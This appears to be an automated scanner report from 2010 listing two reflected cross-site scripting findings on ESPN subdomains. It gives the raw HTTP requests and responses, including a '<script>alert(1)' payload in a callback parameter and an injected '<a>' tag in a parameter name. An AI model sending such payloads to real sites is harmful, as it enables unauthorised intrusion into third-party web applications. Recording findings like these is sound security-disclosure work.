1. Cross-site scripting (reflected)
1.1. http://sports-ak.espn.go.com/espn/mega/allMenus [callback parameter]
1.2. http://sports-ak.espn.go.com/espn/rss/news [name of an arbitrarily supplied request parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://sports-ak.espn.go |
Path: | /espn/mega/allMenus |
GET /espn/mega/allMenus?l Accept: */* Referer: http://espn.go.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: sports-ak.espn.go.com Proxy-Connection: Keep-Alive Cookie: SWID=A7A88F7D-C023-45F5 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Last-Modified: Sun, 07 Nov 2010 22:04:13 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN04 Cache-Expires: Sun, 07 Nov 2010 22:09:13 GMT Vary: Accept-Encoding Cache-Control: max-age=300 Date: Sun, 07 Nov 2010 22:04:15 GMT Connection: close Content-Length: 142217 jsonpallmenusb06fd<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://sports-ak.espn.go |
Path: | /espn/rss/news |
GET /espn/rss/news?aae6e<a>3ef52cdde45=1 HTTP/1.1 Host: sports-ak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: broadbandAccess=espn3 |
HTTP/1.1 200 OK Content-Type: text/xml; charset=iso-8859-1 Last-Modified: Sun, 07 Nov 2010 22:03:15 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN20 Cache-Expires: Sun, 07 Nov 2010 22:18:30 GMT Content-Length: 16453 Cache-Control: max-age=15 Date: Sun, 07 Nov 2010 22:03:16 GMT Connection: close <?xml version="1.0" encoding="utf-8"?> <?xml-stylesheet href="http://sports.espn <rss version="2.0" xmlns:dc="http://purl.org ...[SNIP]... <atom:link rel="self" href="http://sports.espn ...[SNIP]... |